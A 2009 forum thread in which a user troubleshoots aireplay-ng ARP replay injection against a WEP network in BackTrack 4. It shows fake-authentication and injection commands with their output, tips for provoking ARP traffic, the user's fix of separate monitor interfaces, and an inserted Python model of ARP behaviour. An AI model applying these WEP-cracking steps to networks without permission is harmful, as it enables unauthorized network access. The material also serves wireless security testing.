Remote Exploit Forums

  #1 (permalink)  
Old 10-29-2009, 10:40 AM
Isohump's Avatar
Member
 
Join Date: Sep 2009
Posts: 52
Not capturing packets correctly

I'm having a problem with capturing packets; this is the first time it has happened to me and I googled the problem. Now it works fine with BackTrack 3 and Ubuntu, but for some reason with BackTrack 4 it's not working. These are the commands I'm using and the outputs I'm getting.


Code:
root@YOU:~# aireplay-ng -1 0 -a 00:1D:68:E8:9A:87 mon0
No source MAC (-h) specified. Using the device MAC (00:24:2B:7C:3E:9D)
22:46:04  Waiting for beacon frame (BSSID: 00:1D:68:E8:9A:87) on channel 1

22:46:04  Sending Authentication Request (Open System) [ACK]
22:46:04  Authentication successful
22:46:04  Sending Association Request [ACK]
22:46:04  Association successful :-) (AID: 1)
root@YOU:~# aireplay-ng -3 -b 00:1D:68:E8:9A:87 mon0
No source MAC (-h) specified. Using the device MAC (00:24:2B:7C:3E:9D)
22:46:32  Waiting for beacon frame (BSSID: 00:1D:68:E8:9A:87) on channel 1
Saving ARP requests in replay_arp-1028-224632.cap
You should also start airodump-ng to capture replies.
1280 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

I know it said it didn't specify a MAC, but even when I do specify a MAC it still doesn't work.

Code:
 CH  1 ][ Elapsed: 2 mins ][ 2009-10-28 22:48

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:1D:68:E8:9A:87  -60 100     1653       73    0   1  54   WEP  WEP    OPN  Thomson1492EA

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:1D:68:E8:9A:87  00:11:22:33:44:55   -1    1 - 0      0        2
 00:1D:68:E8:9A:87  00:24:2B:7C:3E:9D    0    1 - 1      0       25

Any suggestions would be great.... THNX
__________________
One day your life will flash before your eyes. Make sure its worth watching.

Last edited by Isohump; 10-29-2009 at 10:54 AM.
  #2 (permalink)  
Old 10-29-2009, 11:38 PM
New Member
 
Join Date: Oct 2009
Posts: 1

Seems like it hasn't located a useable packet for re-injection.

Simply ping an unreachable or non-existent IP from the client on the network; it will broadcast and then aireplay-ng will pick it up and start re-injection.
  #3 (permalink)  
Old 10-30-2009, 12:53 AM
Isohump's Avatar
Member
 
Join Date: Sep 2009
Posts: 52

Just tried it, still no luck.
  #4 (permalink)  
Old 10-30-2009, 01:16 AM
Gitsnik's Avatar
Senior Member
 
Join Date: Jun 2009
Location: The Crystal Wind
Posts: 494

If you use Wireshark on the interface and put in the WEP key, can you see ARP packets being sent across the wire(less) when you try to ping other machines?
__________________
Never underestimate the power of human stupidity - it is like a force of nature, capable of destroying even the most well laid plans.
  #5 (permalink)  
Old 10-30-2009, 11:03 AM
Isohump's Avatar
Member
 
Join Date: Sep 2009
Posts: 52

Do you mean ping the router or the computers connected? If they are the computers connected, how am I supposed to go about doing that when I'm not connected to the router?
  #6 (permalink)  
Old 10-30-2009, 11:38 AM
Junior Member
 
Join Date: Sep 2009
Posts: 14

What Gitsnik says is: ping the router with a computer already connected on the network and then look on your unconnected computer if you see some ARP packets.
  #7 (permalink)  
Old 10-30-2009, 11:52 AM
Gitsnik's Avatar
Senior Member
 
Join Date: Jun 2009
Location: The Crystal Wind
Posts: 494

Quote:
Originally Posted by mortis
What Gitsnik says is: ping the router with a computer already connected on the network and then look on your unconnected computer if you see some ARP packets.

Correct. Or a non-existent IP from a connected computer (more likely to generate an ARP).

If the router is 192.168.1.1 and the connected machine is 192.168.1.2, the connected machine should try to ping 192.168.1.3 for maximum chance of creating an ARP packet. Then, the unconnected attacker should pick it up. If it does not, Wireshark should at least see what is operating on the network - so if you see an ARP packet in Wireshark, there is something wrong with your aircrack installation.
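
Added example (not part of any post in this thread): a simplified model of when a host broadcasts an ARP request, showing why a ping to an unused on-link address keeps generating ARP while a ping to the router usually generates none. The addresses 192.168.1.1 to 192.168.1.3 come from the post above; the /24 mask, the already-cached gateway entry and the off-link address 10.0.0.1 are assumptions made for the illustration.

```python
import ipaddress

def next_hop(src_ip, prefix_len, gateway, dst_ip):
    """IP whose MAC the sender needs: the destination if on-link, else the gateway."""
    net = ipaddress.ip_network(f"{src_ip}/{prefix_len}", strict=False)
    return dst_ip if ipaddress.ip_address(dst_ip) in net else gateway

def arp_requests(src_ip, prefix_len, gateway, pings, live_hosts, cache=()):
    """Simplified model: list the ARP who-has targets broadcast for a run of pings.

    A reply from a live host fills the cache, so it is asked only once. A host
    that does not exist never replies, so every attempt broadcasts again. Real
    stacks add retries and cache timeouts, which this model ignores.
    """
    cache = set(cache)
    sent = []
    for dst in pings:
        hop = next_hop(src_ip, prefix_len, gateway, dst)
        if hop in cache:
            continue            # MAC already known: no ARP goes out
        sent.append(hop)        # broadcast "who-has <hop> tell <src_ip>"
        if hop in live_hosts:
            cache.add(hop)      # reply received, cached for later packets
    return sent

# Addresses from the post; the /24 mask and the live-host set are assumptions.
CLIENT, GATEWAY = "192.168.1.2", "192.168.1.1"
LIVE = {"192.168.1.1", "192.168.1.2"}

def demo():
    warm = {GATEWAY}  # assumption: the client has already talked to the router
    return {
        "router": arp_requests(CLIENT, 24, GATEWAY, [GATEWAY] * 3, LIVE, warm),
        "unused": arp_requests(CLIENT, 24, GATEWAY, ["192.168.1.3"] * 3, LIVE, warm),
        "off_link": arp_requests(CLIENT, 24, GATEWAY, ["10.0.0.1"] * 3, LIVE, warm),
        "cold_router": arp_requests(CLIENT, 24, GATEWAY, [GATEWAY] * 3, LIVE),
    }

if __name__ == "__main__":
    for name, reqs in demo().items():
        print(f"{name:12s} -> {len(reqs)} ARP request(s): {reqs}")
```
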
  #8 (permalink)  
Old 10-30-2009, 12:52 PM
Isohump's Avatar
Member
 
Join Date: Sep 2009
Posts: 52

I just figured it out: I have to use mon0 for injecting and mon1 for capturing, and on top of all that wlan0 must be down. Weird, huh? Well, if anyone has the same problem as me, try it out and see if that works for you. ^_^

And thanks for all of your feedback Gitsnik, Mortis and Hawaii.

Last edited by Isohump; 10-30-2009 at 12:58 PM.
All times are GMT.